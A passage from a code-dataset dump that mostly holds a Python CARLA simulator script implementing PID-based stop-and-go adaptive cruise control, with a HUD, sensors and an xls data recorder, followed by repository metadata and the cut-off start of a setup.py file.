1 - K_0)\n elif event.key == K_r:\n world.camera_manager.toggle_recording()\n elif event.key == K_q:\n self._control.gear = 1 if self._control.reverse else -1\n elif event.key == K_m:\n self._control.manual_gear_shift = not self._control.manual_gear_shift\n self._control.gear = world.vehicle.get_vehicle_control().gear\n world.hud.notification(\n '%s Transmission' % ('Manual' if self._control.manual_gear_shift else 'Automatic'))\n elif self._control.manual_gear_shift and event.key == K_COMMA:\n self._control.gear = max(-1, self._control.gear - 1)\n elif self._control.manual_gear_shift and event.key == K_PERIOD:\n self._control.gear = self._control.gear + 1\n elif event.key == K_p:\n self._autopilot_enabled = not self._autopilot_enabled\n world.vehicle.set_autopilot(self._autopilot_enabled)\n world.hud.notification('Autopilot %s' % ('On' if self._autopilot_enabled else 'Off'))\n if not self._autopilot_enabled:\n self._parse_keys(pygame.key.get_pressed(), clock.get_time())\n self._control.reverse = self._control.gear < 0\n\n def _parse_keys(self, keys, milliseconds):\n self._control.throttle = 1.0 if keys[K_UP] or keys[K_w] else 0.0\n steer_increment = 5e-4 * milliseconds\n if keys[K_LEFT] or keys[K_a]:\n self._steer_cache -= steer_increment\n elif keys[K_RIGHT] or keys[K_d]:\n self._steer_cache += steer_increment\n else:\n self._steer_cache = 0.0\n self._steer_cache = min(0.7, max(-0.7, self._steer_cache))\n self._control.steer = round(self._steer_cache, 1)\n self._control.brake = 1.0 if keys[K_DOWN] or keys[K_s] else 0.0\n self._control.hand_brake = keys[K_SPACE]\n\n @staticmethod\n def _is_quit_shortcut(key):\n return (key == K_ESCAPE) or (key == K_q and pygame.key.get_mods() & KMOD_CTRL)\n\n\n# ==============================================================================\n# -- PIDControl -----------------------------------------------------------\n# ==============================================================================\n\nclass VehiclePIDController():\n \"\"\"\n VehiclePIDController is the combination of two PID controllers (lateral and longitudinal) to perform the\n low level control a vehicle from client side\n \"\"\"\n\n def __init__(self, vehicle,\n args_lateral={'K_P': 1.12, 'K_D': 0.005, 'K_I': 1.17},\n args_longitudinal={'K_P': 1.0, 'K_D':0 , 'K_I': 1}):\n \"\"\"\n :param vehicle: actor to 
apply to local planner logic onto\n :param args_lateral: dictionary of arguments to set the lateral PID controller using the following semantics:\n K_P -- Proportional term\n K_D -- Differential term\n K_I -- Integral term\n :param args_longitudinal: dictionary of arguments to set the longitudinal PID controller using the following\n semantics:\n K_P -- Proportional term\n K_D -- Differential term\n K_I -- Integral term\n \"\"\"\n self._vehicle = vehicle\n self._world = self._vehicle.get_world()\n self._lon_controller = PIDLongitudinalController(\n self._vehicle, **args_longitudinal)\n self._lat_controller = PIDLateralController(\n self._vehicle, **args_lateral)\n\n def run_step(self):\n \"\"\"\n Execute one step of control invoking both lateral and longitudinal PID controllers to reach a target waypoint\n at a given target_speed.\n\n :param target_speed: desired vehicle speed\n :param waypoint: target location encoded as a waypoint\n :return: distance (in meters) to the waypoint\n \"\"\"\n throttle = self._lon_controller.run_step()\n steering = self._lat_controller.run_step()\n\n control = carla.VehicleControl()\n control.steer = steering\n control.throttle = throttle\n control.brake = 0.0\n control.hand_brake = False\n control.manual_gear_shift = False\n\n return control\n\n\nclass PIDLongitudinalController():\n \"\"\"\n PIDLongitudinalController implements longitudinal control using a PID.\n \"\"\"\n\n def __init__(self, vehicle, K_P=1.0, K_D=0.0, K_I=0.0, dt=0.03):\n \"\"\"\n :param vehicle: actor to apply to local planner logic onto\n :param K_P: Proportional term\n :param K_D: Differential term\n :param K_I: Integral term\n :param dt: time differential in seconds\n \"\"\"\n self._vehicle = vehicle\n self._world = self._vehicle.get_world()\n self._K_P = K_P\n self._K_D = K_D\n self._K_I = K_I\n self._dt = dt\n self._e_buffer = deque(maxlen=30)\n\n\n def speed_setting(self):\n global target_vehicle\n target_vehicle = None\n ego_vehicle = self._vehicle\n ego_vehicle_location = self._vehicle.get_location()\n # ego_vehicle_waypoint = self._world.get_map().get_waypoint(ego_vehicle_location)\n vehicle_list = self._world.get_actors().filter(\"*vehicle*\")\n\n car_number = len(vehicle_list)\n \n if car_number > 1:\n # if target_vehicle is None: \n # for index in vehicle_list:\n # if index.id != ego_vehicle.id:\n # target_vehicle = index\n # break\n # else:\n # pass\n # else: \n # target_vehicle_location = target_vehicle.get_location()\n # # target_vehicle_waypoint = self._world.get_map().get_waypoint(target_vehicle_location)\n # # if target_vehicle_waypoint.road_id == ego_vehicle_waypoint.road_id or\\\n # # target_vehicle_waypoint.lane_id == ego_vehicle_waypoint.lane_id:\n # offset = abs(ego_vehicle_location.y - target_vehicle_location.y)\n # if offset < 1.7:\n # return get_speed(target_vehicle) \n # else:\n # return 60\n # target_vehicle = vehicle_list[0]\n\n for index in vehicle_list:\n if index.id != ego_vehicle.id:\n target_vehicle = index\n break\n else:\n pass\n # target_vehicle_waypoint = self._world.get_map().get_waypoint(target_vehicle_location)\n # if target_vehicle_waypoint.road_id == ego_vehicle_waypoint.road_id or\\\n # target_vehicle_waypoint.lane_id == ego_vehicle_waypoint.lane_id:\n target_vehicle_location = target_vehicle.get_location()\n offset = abs(ego_vehicle_location.x - target_vehicle_location.x)\n if offset < 1.77:\n return get_speed(target_vehicle)\n else:\n return 20 \n \n else:\n return 20\n \n\n\n def run_step(self, debug=False):\n \"\"\"\n Execute one step of 
longitudinal control to reach a given target speed.\n\n :param target_speed: target speed in Km/h\n :return: throttle control in the range [0, 1]\n \"\"\"\n current_speed = get_speed(self._vehicle)\n\n if debug:\n print('Current speed = {}'.format(current_speed))\n\n return self._pid_control( current_speed)\n\n\n def _pid_control(self, current_speed):\n \"\"\"\n Estimate the throttle of the vehicle based on the PID equations\n\n :param target_speed: target speed in Km/h\n :param current_speed: current speed of the vehicle in Km/h\n :return: throttle control in the range [0, 1]\n \"\"\"\n target_speed = self.speed_setting()\n _e = (target_speed - current_speed)\n self._e_buffer.append(_e)\n\n if len(self._e_buffer) >= 2:\n _de = (self._e_buffer[-1] - self._e_buffer[-2]) / self._dt\n _ie = sum(self._e_buffer) * self._dt\n else:\n _de = 0.0\n _ie = 0.0\n\n return np.clip((self._K_P * _e) + (self._K_D * _de / self._dt) + (self._K_I * _ie * self._dt), 0.0, 1.0)\n\n\nclass PIDLateralController():\n \"\"\"\n PIDLateralController implements lateral control using a PID.\n \"\"\"\n\n def __init__(self, vehicle, K_P=1.0, K_D=0.0, K_I=0.0, dt=0.03):\n \"\"\"\n :param vehicle: actor to apply to local planner logic onto\n :param K_P: Proportional term\n :param K_D: Differential term\n :param K_I: Integral term\n :param dt: time differential in seconds\n \"\"\"\n self._vehicle = vehicle\n self._world = self._vehicle.get_world()\n self._K_P = K_P\n self._K_D = K_D\n self._K_I = K_I\n self._dt = dt\n self._e_buffer = deque(maxlen=10)\n\n def waypoint_setting(self):\n target_vehicle = None\n ego_vehicle = self._vehicle\n ego_vehicle_location = self._vehicle.get_location()\n # ego_vehicle_waypoint = self._world.get_map().get_waypoint(ego_vehicle_location)\n vehicle_list = self._world.get_actors().filter(\"*vehicle*\")\n\n car_number = len(vehicle_list)\n \n\n # if target_vehicle is None: \n # for index in vehicle_list:\n # if index.id != ego_vehicle.id:\n # target_vehicle = index\n # break\n # else:\n # pass\n # else: \n # target_vehicle_location = target_vehicle.get_location()\n # # target_vehicle_waypoint = self._world.get_map().get_waypoint(target_vehicle_location)\n # # if target_vehicle_waypoint.road_id == ego_vehicle_waypoint.road_id or\\\n # # target_vehicle_waypoint.lane_id == ego_vehicle_waypoint.lane_id:\n # offset = abs(ego_vehicle_location.y - target_vehicle_location.y)\n # if offset < 1.7:\n # return get_speed(target_vehicle) \n # else:\n # return 60\n # target_vehicle = vehicle_list[0]\n\n for index in vehicle_list:\n if index.id != ego_vehicle.id:\n target_vehicle = index\n break\n else:\n pass\n # target_vehicle_waypoint = self._world.get_map().get_waypoint(target_vehicle_location)\n # if target_vehicle_waypoint.road_id == ego_vehicle_waypoint.road_id or\\\n # target_vehicle_waypoint.lane_id == ego_vehicle_waypoint.lane_id:\n target_vehicle_location = target_vehicle.get_location()\n waypoint = self._world.get_map().get_waypoint(target_vehicle_location)\n \n return waypoint \n \n\n\n def run_step(self):\n \"\"\"\n Execute one step of lateral control to steer the vehicle towards a certain waypoin.\n\n :param waypoint: target waypoint\n :return: steering control in the range [-1, 1] where:\n -1 represent maximum steering to left\n +1 maximum steering to right\n \"\"\"\n return self._pid_control( self._vehicle.get_transform())\n\n def _pid_control(self, vehicle_transform):\n \"\"\"\n Estimate the steering angle of the vehicle based on the PID equations\n\n :param waypoint: target waypoint\n 
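(note: the waypoint is not passed in; it is recomputed internally via self.waypoint_setting())\n        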
:param vehicle_transform: current transform of the vehicle\n :return: steering control in the range [-1, 1]\n \"\"\"\n # print (waypoint)\n waypoint = self.waypoint_setting()\n v_begin = vehicle_transform.location\n v_end = v_begin + carla.Location(x=math.cos(math.radians(vehicle_transform.rotation.yaw)),\n y=math.sin(math.radians(vehicle_transform.rotation.yaw)))\n\n v_vec = np.array([v_end.x - v_begin.x, v_end.y - v_begin.y, 0.0])\n w_vec = np.array([waypoint.transform.location.x -\n v_begin.x, waypoint.transform.location.y -\n v_begin.y, 0.0])\n _dot = math.acos(np.clip(np.dot(w_vec, v_vec) /\n (np.linalg.norm(w_vec) * np.linalg.norm(v_vec)), -1.0, 1.0))\n\n _cross = np.cross(v_vec, w_vec)\n if _cross[2] < 0:\n _dot *= -1.0\n\n self._e_buffer.append(_dot)\n if len(self._e_buffer) >= 2:\n _de = (self._e_buffer[-1] - self._e_buffer[-2]) / self._dt\n _ie = sum(self._e_buffer) * self._dt\n else:\n _de = 0.0\n _ie = 0.0\n\n return np.clip((self._K_P * _dot) + (self._K_D * _de /\n self._dt) + (self._K_I * _ie * self._dt), -1.0, 1.0)\n\n# ==============================================================================\n# -- HUD -----------------------------------------------------------------\n# ==============================================================================\n\n\nclass HUD(object):\n def __init__(self, width, height):\n self.dim = (width, height)\n font = pygame.font.Font(pygame.font.get_default_font(), 20)\n fonts = [x for x in pygame.font.get_fonts() if 'mono' in x]\n default_font = 'ubuntumono'\n mono = default_font if default_font in fonts else fonts[0]\n mono = pygame.font.match_font(mono)\n self._font_mono = pygame.font.Font(mono, 14)\n self._notifications = FadingText(font, (width, 40), (0, height - 40))\n self.help = HelpText(pygame.font.Font(mono, 24), width, height)\n self.server_fps = 0\n self.frame_number = 0\n self.simulation_time = 0\n self._show_info = True\n self._info_text = []\n self._server_clock = pygame.time.Clock()\n\n def on_world_tick(self, timestamp):\n self._server_clock.tick()\n self.server_fps = self._server_clock.get_fps()\n self.frame_number = timestamp.frame_count\n self.simulation_time = timestamp.elapsed_seconds\n\n def tick(self, world, clock):\n if not self._show_info:\n return\n t = world.vehicle.get_transform()\n v = world.vehicle.get_velocity()\n c = world.vehicle.get_vehicle_control()\n heading = 'N' if abs(t.rotation.yaw) < 89.5 else ''\n heading += 'S' if abs(t.rotation.yaw) > 90.5 else ''\n heading += 'E' if 179.5 > t.rotation.yaw > 0.5 else ''\n heading += 'W' if -0.5 > t.rotation.yaw > -179.5 else ''\n colhist = world.collision_sensor.get_collision_history()\n collision = [colhist[x + self.frame_number - 200] for x in range(0, 200)]\n max_col = max(1.0, max(collision))\n collision = [x / max_col for x in collision]\n vehicles = world.world.get_actors().filter('vehicle.*')\n self._info_text = [\n 'Server: % 16d FPS' % self.server_fps,\n '',\n 'Vehicle: % 20s' % get_actor_display_name(world.vehicle, truncate=20),\n 'Map: % 20s' % world.world.map_name,\n 'Simulation time: % 12s' % datetime.timedelta(seconds=int(self.simulation_time)),\n '',\n 'Speed: % 15.0f km/h' % (3.6 * math.sqrt(v.x**2 + v.y**2 + v.z**2)),\n u'Heading:% 16.0f\\N{DEGREE SIGN} % 2s' % (t.rotation.yaw, heading),\n 'Location:% 20s' % ('(% 5.1f, % 5.1f)' % (t.location.x, t.location.y)),\n 'Height: % 18.0f m' % t.location.z,\n 'Traffic_lights: % 16d FPS' % self.server_fps,\n '', \n '',\n ('Throttle:', c.throttle, 0.0, 1.0),\n ('Steer:', c.steer, -1.0, 1.0),\n ('Brake:', 
c.brake, 0.0, 1.0),\n ('Reverse:', c.reverse),\n ('Hand brake:', c.hand_brake),\n ('Manual:', c.manual_gear_shift),\n 'Gear: %s' % {-1: 'R', 0: 'N'}.get(c.gear, c.gear),\n '',\n 'Collision:',\n collision,\n '',\n 'Number of vehicles: % 8d' % len(vehicles)\n ]\n if len(vehicles) > 1:\n self._info_text += ['Nearby vehicles:']\n distance = lambda l: math.sqrt((l.x - t.location.x)**2 + (l.y - t.location.y)**2 + (l.z - t.location.z)**2)\n vehicles = [(distance(x.get_location()), x) for x in vehicles if x.id != world.vehicle.id]\n for d, vehicle in sorted(vehicles):\n if d > 200.0:\n break\n vehicle_type = get_actor_display_name(vehicle, truncate=22)\n self._info_text.append('% 4dm %s' % (d, vehicle_type))\n self._notifications.tick(world, clock)\n\n def toggle_info(self):\n self._show_info = not self._show_info\n\n def notification(self, text, seconds=2.0):\n self._notifications.set_text(text, seconds=seconds)\n\n def error(self, text):\n self._notifications.set_text('Error: %s' % text, (255, 0, 0))\n\n def render(self, display):\n if self._show_info:\n info_surface = pygame.Surface((220, self.dim[1]))\n info_surface.set_alpha(100)\n display.blit(info_surface, (0, 0))\n v_offset = 4\n bar_h_offset = 100\n bar_width = 106\n for item in self._info_text:\n if v_offset + 18 > self.dim[1]:\n break\n if isinstance(item, list):\n if len(item) > 1:\n points = [(x + 8, v_offset + 8 + (1.0 - y) * 30) for x, y in enumerate(item)]\n pygame.draw.lines(display, (255, 136, 0), False, points, 2)\n item = None\n v_offset += 18\n elif isinstance(item, tuple):\n if isinstance(item[1], bool):\n rect = pygame.Rect((bar_h_offset, v_offset + 8), (6, 6))\n pygame.draw.rect(display, (255, 255, 255), rect, 0 if item[1] else 1)\n else:\n rect_border = pygame.Rect((bar_h_offset, v_offset + 8), (bar_width, 6))\n pygame.draw.rect(display, (255, 255, 255), rect_border, 1)\n f = (item[1] - item[2]) / (item[3] - item[2])\n if item[2] < 0.0:\n rect = pygame.Rect((bar_h_offset + f * (bar_width - 6), v_offset + 8), (6, 6))\n else:\n rect = pygame.Rect((bar_h_offset, v_offset + 8), (f * bar_width, 6))\n pygame.draw.rect(display, (255, 255, 255), rect)\n item = item[0]\n if item: # At this point has to be a str.\n surface = self._font_mono.render(item, True, (255, 255, 255))\n display.blit(surface, (8, v_offset))\n v_offset += 18\n self._notifications.render(display)\n self.help.render(display)\n\n\n# ==============================================================================\n# -- FadingText ----------------------------------------------------------------\n# ==============================================================================\n\nclass FadingText(object):\n def __init__(self, font, dim, pos):\n self.font = font\n self.dim = dim\n self.pos = pos\n self.seconds_left = 0\n self.surface = pygame.Surface(self.dim)\n\n def set_text(self, text, color=(255, 255, 255), seconds=2.0):\n text_texture = self.font.render(text, True, color)\n self.surface = pygame.Surface(self.dim)\n self.seconds_left = seconds\n self.surface.fill((0, 0, 0, 0))\n self.surface.blit(text_texture, (10, 11))\n\n def tick(self, _, clock):\n delta_seconds = 1e-3 * clock.get_time()\n self.seconds_left = max(0.0, self.seconds_left - delta_seconds)\n self.surface.set_alpha(500.0 * self.seconds_left)\n\n def render(self, display):\n display.blit(self.surface, self.pos)\n\n# ==============================================================================\n# -- HelpText ------------------------------------------------------------------\n# 
==============================================================================\n\n\nclass HelpText(object):\n def __init__(self, font, width, height):\n lines = __doc__.split('\\n')\n self.font = font\n self.dim = (680, len(lines) * 22 + 12)\n self.pos = (0.5 * width - 0.5 * self.dim[0], 0.5 * height - 0.5 * self.dim[1])\n self.seconds_left = 0\n self.surface = pygame.Surface(self.dim)\n self.surface.fill((0, 0, 0, 0))\n for n, line in enumerate(lines):\n text_texture = self.font.render(line, True, (255, 255, 255))\n self.surface.blit(text_texture, (22, n * 22))\n self._render = False\n self.surface.set_alpha(220)\n\n def toggle(self):\n self._render = not self._render\n\n def render(self, display):\n if self._render:\n display.blit(self.surface, self.pos)\n\n# ==============================================================================\n# -- CollisionSensor -----------------------------------------------------------\n# ==============================================================================\n\n\nclass CollisionSensor(object):\n def __init__(self, parent_actor, hud):\n self.sensor = None\n self._history = []\n self._parent = parent_actor\n self._hud = hud\n world = self._parent.get_world()\n bp = world.get_blueprint_library().find('sensor.other.collision')\n self.sensor = world.spawn_actor(bp, carla.Transform(), attach_to=self._parent)\n # We need to pass the lambda a weak reference to self to avoid circular\n # reference.\n weak_self = weakref.ref(self)\n self.sensor.listen(lambda event: CollisionSensor._on_collision(weak_self, event))\n\n def get_collision_history(self):\n history = collections.defaultdict(int)\n for frame, intensity in self._history:\n history[frame] += intensity\n return history\n\n @staticmethod\n def _on_collision(weak_self, event):\n self = weak_self()\n if not self:\n return\n actor_type = get_actor_display_name(event.other_actor)\n self._hud.notification('Collision with %r, id = %d' % (actor_type, event.other_actor.id))\n impulse = event.normal_impulse\n intensity = math.sqrt(impulse.x ** 2 + impulse.y ** 2 + impulse.z ** 2)\n self._history.append((event.frame_number, intensity))\n if len(self._history) > 4000:\n self._history.pop(0)\n\n\n# ==============================================================================\n# -- LaneInvasionSensor --------------------------------------------------------\n# ==============================================================================\n\nclass LaneInvasionSensor(object):\n def __init__(self, parent_actor, hud):\n self.sensor = None\n self._parent = parent_actor\n self._hud = hud\n world = self._parent.get_world()\n bp = world.get_blueprint_library().find('sensor.other.lane_detector')\n self.sensor = world.spawn_actor(bp, carla.Transform(), attach_to=self._parent)\n # We need to pass the lambda a weak reference to self to avoid circular\n # reference.\n weak_self = weakref.ref(self)\n self.sensor.listen(lambda event: LaneInvasionSensor._on_invasion(weak_self, event))\n\n @staticmethod\n def _on_invasion(weak_self, event):\n self = weak_self()\n if not self:\n return\n text = ['%r' % str(x).split()[-1] for x in set(event.crossed_lane_markings)]\n self._hud.notification('Crossed line %s' % ' and '.join(text))\n\n\n# ==============================================================================\n# -- CameraManager -------------------------------------------------------------\n# ==============================================================================\n\nclass CameraManager(object):\n def __init__(self, 
parent_actor, hud):\n self.sensor = None\n self._surface = None\n self._parent = parent_actor\n self._hud = hud\n self._recording = False\n self._camera_transforms = [\n carla.Transform(carla.Location(x=-5.5, z=2.8), carla.Rotation(pitch=-15)),\n carla.Transform(carla.Location(x=1.6, z=1.7))]\n self._transform_index = 1\n self._sensors = [\n ['sensor.camera.rgb', cc.Raw, 'Camera RGB'],\n ['sensor.camera.depth', cc.Raw, 'Camera Depth (Raw)'],\n ['sensor.camera.depth', cc.Depth, 'Camera Depth (Gray Scale)'],\n ['sensor.camera.depth', cc.LogarithmicDepth, 'Camera Depth (Logarithmic Gray Scale)'],\n ['sensor.camera.semantic_segmentation', cc.Raw, 'Camera Semantic Segmentation (Raw)'],\n ['sensor.camera.semantic_segmentation', cc.CityScapesPalette,\n 'Camera Semantic Segmentation (CityScapes Palette)'],\n ['sensor.lidar.ray_cast', None, 'Lidar (Ray-Cast)']]\n world = self._parent.get_world()\n bp_library = world.get_blueprint_library()\n for item in self._sensors:\n bp = bp_library.find(item[0])\n if item[0].startswith('sensor.camera'):\n bp.set_attribute('image_size_x', str(hud.dim[0]))\n bp.set_attribute('image_size_y', str(hud.dim[1]))\n item.append(bp)\n self._index = None\n\n def toggle_camera(self):\n self._transform_index = (self._transform_index + 1) % len(self._camera_transforms)\n self.sensor.set_transform(self._camera_transforms[self._transform_index])\n\n def set_sensor(self, index, notify=True):\n index = index % len(self._sensors)\n needs_respawn = True if self._index is None \\\n else self._sensors[index][0] != self._sensors[self._index][0]\n if needs_respawn:\n if self.sensor is not None:\n self.sensor.destroy()\n self._surface = None\n self.sensor = self._parent.get_world().spawn_actor(\n self._sensors[index][-1],\n self._camera_transforms[self._transform_index],\n attach_to=self._parent)\n # We need to pass the lambda a weak reference to self to avoid\n # circular reference.\n weak_self = weakref.ref(self)\n self.sensor.listen(lambda image: CameraManager._parse_image(weak_self, image))\n if notify:\n self._hud.notification(self._sensors[index][2])\n self._index = index\n\n def next_sensor(self):\n self.set_sensor(self._index + 1)\n\n def toggle_recording(self):\n self._recording = not self._recording\n self._hud.notification('Recording %s' % ('On' if self._recording else 'Off'))\n\n def render(self, display):\n if self._surface is not None:\n display.blit(self._surface, (0, 0))\n\n @staticmethod\n def _parse_image(weak_self, image):\n self = weak_self()\n if not self:\n return\n if self._sensors[self._index][0].startswith('sensor.lidar'):\n points = np.frombuffer(image.raw_data, dtype=np.dtype('f4'))\n points = np.reshape(points, (int(points.shape[0] / 3), 3))\n lidar_data = np.array(points[:, :2])\n lidar_data *= min(self._hud.dim) / 100.0\n lidar_data += (0.5 * self._hud.dim[0], 0.5 * self._hud.dim[1])\n lidar_data = np.fabs(lidar_data)\n lidar_data = lidar_data.astype(np.int32)\n lidar_data = np.reshape(lidar_data, (-1, 2))\n lidar_img_size = (self._hud.dim[0], self._hud.dim[1], 3)\n lidar_img = np.zeros(lidar_img_size)\n lidar_img[tuple(lidar_data.T)] = (255, 255, 255)\n self._surface = pygame.surfarray.make_surface(lidar_img)\n else:\n image.convert(self._sensors[self._index][1])\n array = np.frombuffer(image.raw_data, dtype=np.dtype(\"uint8\"))\n array = np.reshape(array, (image.height, image.width, 4))\n array = array[:, :, :3]\n array = array[:, :, ::-1]\n self._surface = pygame.surfarray.make_surface(array.swapaxes(0, 1))\n if self._recording:\n 
image.save_to_disk('_out/%08d' % image.frame_number)\n\n\n# ==============================================================================\n# -- Recorder() ---------------------------------------------------------\n# ==============================================================================\nclass Recorder(object):\n def __init__(self,vehicle,support_vehicle,controller,workbook):\n self.vehicle = vehicle\n self.support_vehicle = support_vehicle\n self.world = vehicle.get_world()\n self.workbook = workbook\n self.counter = 1\n self.sheetname = str(get_actor_display_name(vehicle, truncate=20))\n self.sheet = workbook.add_sheet(self.sheetname)\n self.vehicle_list = self.world.get_actors().filter(\"vehicle*\")\n self.controller = controller\n self.workbookname = str(time.strftime('%Y.%m.%d_%H%M%S',time.localtime(time.time()))) \\\n + '_ID_' + str(vehicle.id) + '.xls'\n self.sheet.write(0,0,\"Ego_Speed\")\n self.sheet.write(0,1,\"Supporting_Speed\") \n self.sheet.write(0,2,\"Target_Speed\")\n self.sheet.write(0,3,\"Ego_Acceleration\")\n self.sheet.write(0,4,\"Supporting_Acceleration\")\n self.sheet.write(0,5,\"Ego_Location_y\")\n self.sheet.write(0,6,\"Support_Location_y\")\n self.sheet.write(0,7,\"Support_Yaw_Angle\")\n self.sheet.write(0,8,\"Ego_Yaw_Angle\")\n self.sheet.write(0,9,\"Throttle\")\n self.sheet.write(0,10,\"Steer\")\n self.sheet.write(0,11,\"Brake\")\n self.sheet.write(0,12,\"Relative_distance\")\n\n \n def start_recorder(self):\n wb = self.workbook\n vehicle = self.vehicle\n row = self.counter\n worksheet = self.sheet\n supporting_actor = self.support_vehicle\n controller = self.controller\n\n control = vehicle.get_vehicle_control()\n ego_velocity = vehicle.get_velocity() \n support_velocity = supporting_actor.get_velocity()\n target_speed = controller\n ego_acceleration_vector = vehicle.get_acceleration()\n sup_acceleration_vector = supporting_actor.get_acceleration()\n\n s_loc = supporting_actor.get_location()\n s_loc_x = s_loc.x\n s_loc_y = s_loc.y\n s_loc_z = s_loc.z\n \n support_speed = 3.6 * math.sqrt(support_velocity.x**2 + support_velocity.y**2 + support_velocity.z**2)\n ego_speed = 3.6 * math.sqrt(ego_velocity.x**2 + ego_velocity.y**2 + ego_velocity.z**2)\n target_speed = controller._lon_controller.speed_setting()\n\n ego_acceleration = math.sqrt(ego_acceleration_vector.x**2 + ego_acceleration_vector.y**2 + ego_acceleration_vector.z**2)\n sup_acceleration = math.sqrt(sup_acceleration_vector.x**2 + sup_acceleration_vector.y**2 + sup_acceleration_vector.z**2)\n # sup_acceleration = 10\n ego_location_x = vehicle.get_location().x\n ego_location_y = vehicle.get_location().y\n ego_location_z = vehicle.get_location().z\n \n ego_yaw = vehicle.get_transform().rotation.yaw\n support_yaw = supporting_actor.get_transform().rotation.yaw\n\n throttle = control.throttle\n steer = control.steer\n brake = control.brake\n\n distance = math.sqrt((s_loc_x - ego_location_x)**2 + (s_loc_y - ego_location_y)**2 + (s_loc_z - ego_location_z)**2)\n\n worksheet.write(row,0,ego_speed)\n worksheet.write(row,1,support_speed) \n worksheet.write(row,2,target_speed)\n worksheet.write(row,3,ego_acceleration)\n worksheet.write(row,4,sup_acceleration)\n worksheet.write(row,5,ego_location_y)\n worksheet.write(row,6,s_loc_y)\n worksheet.write(row,7,support_yaw)\n worksheet.write(row,8,ego_yaw)\n worksheet.write(row,9,throttle)\n worksheet.write(row,10,steer)\n worksheet.write(row,11,brake)\n worksheet.write(row,12,distance)\n\n self.counter += 1\n wb.save(self.workbookname)\n\n def 
finish_recorder(self):\n        wb = self.workbook\n        wb.save(self.workbookname)\n\n# ==============================================================================\n# -- game_loop() ---------------------------------------------------------\n# ==============================================================================\n\ndef game_loop(args):\n    pygame.init()\n    pygame.font.init()\n    world = None\n    supporting_actor_list = []\n    try:\n        client = carla.Client(args.host, args.port)\n        client.set_timeout(4.0)\n\n        display = pygame.display.set_mode(\n            (args.width, args.height),\n            pygame.HWSURFACE | pygame.DOUBLEBUF)\n\n        hud = HUD(args.width, args.height)\n        world = World(client.get_world(), hud)\n        blueprint = world.world.get_blueprint_library()\n        transform_1 = carla.Transform (carla.Location(x=-2.10, y=-145.30, z=0.4),carla.Rotation(pitch=0, yaw=90.0, roll=0))\n        carModel_1 = random.choice (blueprint.filter('vehicle.tesla.*')) \n        carModel_1.set_attribute('color','10,10,10')\n        carActor_1 = world.world.try_spawn_actor(carModel_1,transform_1)\n        carActor_1.set_autopilot (True) \n        supporting_actor_list.append(carActor_1) \n        front_vehicle = carActor_1\n\n        controller = KeyboardControl(world, False)\n        PID_controller = VehiclePIDController (world.vehicle)\n        hero = world.vehicle\n        \n        # if args.agent == \"Roaming\":\n        #     agent = RoamingAgent(world.vehicle)\n        # else:\n        #     agent = BasicAgent(world.vehicle)\n        #     spawn_point = world.world.get_map().get_spawn_points()[0]\n        #     agent.set_destination((spawn_point.location.x,\n        #                            spawn_point.location.y,\n        #                            spawn_point.location.z))\n\n        clock = pygame.time.Clock()\n        \n        # this vehicle list only has 1 member\n        vehicle_list_1 = world.world.get_actors().filter(\"*vehicle*\")\n        # this vehicle list has 2 members\n        vehicle_list_2 = PID_controller._world.get_actors().filter(\"*vehicle*\")\n        \n        # if len(vehicle_list) > 1:\n        #     for index in vehicle_list:\n        #         if index.id != world.vehicle.id:\n        #             front_vehicle = index\n        #         else:\n        #             pass \n        # else:\n        #     front_vehicle = hero\n        \n        # way_point = world.world.get_map().get_waypoint(front_vehicle.get_location())\n        # target_transform = carla.Transform (carla.Location(x=-500, y=-7.7, z=0.4),carla.Rotation(pitch=0, yaw=-179.000000, roll=0))\n        way_point = world.world.get_map().get_waypoint(carla.Location(x=-2.1, y=180, z=0))\n        # spawn_point = world.world.get_map().get_spawn_points()[0]\n        # way_point = world.world.get_map().get_waypoint(spawn_point.location)\n        wb = xlwt.Workbook()\n        ego_recorder = Recorder(hero,front_vehicle,PID_controller,wb)\n        while True:\n            # print (way_point)\n            if controller.parse_events(world, clock):\n                return\n\n            # as soon as the server is ready continue!\n            if not world.world.wait_for_tick(10.0):\n                continue\n            # print (front_vehicle.get_location())\n            world.tick(clock)\n            world.render(display)\n            pygame.display.flip()\n            control = PID_controller.run_step()\n            world.vehicle.apply_control(control)\n            ego_recorder.start_recorder()\n            # print (counter)\n            \n            # sheet1.write(counter,0,'haha')\n            # counter = counter + 1 \n            # wb.save('xlwt example_4.xlsx')\n\n    finally:\n        \n        if world is not None:\n            world.destroy()\n\n        print('\\ndestroying %d actors' % len(supporting_actor_list))\n        for actor in supporting_actor_list:\n            actor.destroy() \n\n        pygame.quit()\n\n\n# ==============================================================================\n# -- main() --------------------------------------------------------------\n# ==============================================================================\n\n\ndef main():\n    argparser = argparse.ArgumentParser(\n        description='CARLA Manual 
Control Client')\n argparser.add_argument(\n '-v', '--verbose',\n action='store_true',\n dest='debug',\n help='print debug information')\n argparser.add_argument(\n '--host',\n metavar='H',\n default='127.0.0.1',\n help='IP of the host server (default: 127.0.0.1)')\n argparser.add_argument(\n '-p', '--port',\n metavar='P',\n default=2000,\n type=int,\n help='TCP port to listen to (default: 2000)')\n argparser.add_argument(\n '--res',\n metavar='WIDTHxHEIGHT',\n default='1280x720',\n help='window resolution (default: 1280x720)')\n\n argparser.add_argument(\"-a\", \"--agent\", type=str,\n choices=[\"Roaming\", \"Basic\"],\n help=\"select which agent to run\",\n default=\"Basic\")\n args = argparser.parse_args()\n\n args.width, args.height = [int(x) for x in args.res.split('x')]\n\n log_level = logging.DEBUG if args.debug else logging.INFO\n logging.basicConfig(format='%(levelname)s: %(message)s', level=log_level)\n\n logging.info('listening to server %s:%s', args.host, args.port)\n\n print(__doc__)\n actor_list = []\n\n try:\n game_loop(args)\n except KeyboardInterrupt:\n print('\\nCancelled by user. Bye!')\n except Exception as error:\n logging.exception(error)\n \n finally:\n print('\\ndestroying %d actors' % len(actor_list))\n for actor in actor_list:\n actor.destroy()\n\n\nif __name__ == '__main__':\n\n main()\n","repo_name":"HanzhiC/CARLA-Intelligent-Cruise-System","sub_path":"History_Version/PID_Stop-Go_ACC_04011558.py","file_name":"PID_Stop-Go_ACC_04011558.py","file_ext":"py","file_size_in_byte":47879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40963348058","text":"#!/usr/bin/env python\n# flake8: noqa\nimport os\n\nfrom setuptools import setup, find_packages\nfrom pkg_resources import parse_requirements\n\nreq_file = os.path.join(os.path.dirname(__file__), \"requirements.txt\")\n\nwith open(req_file, 'r') as inst_reqs:\n install_requires = [str(req) for req in parse_requirements(inst_reqs)]\n\npackages = find_packages(include=['convert_app', 'convert_app.*'])\n\nsetup(\n 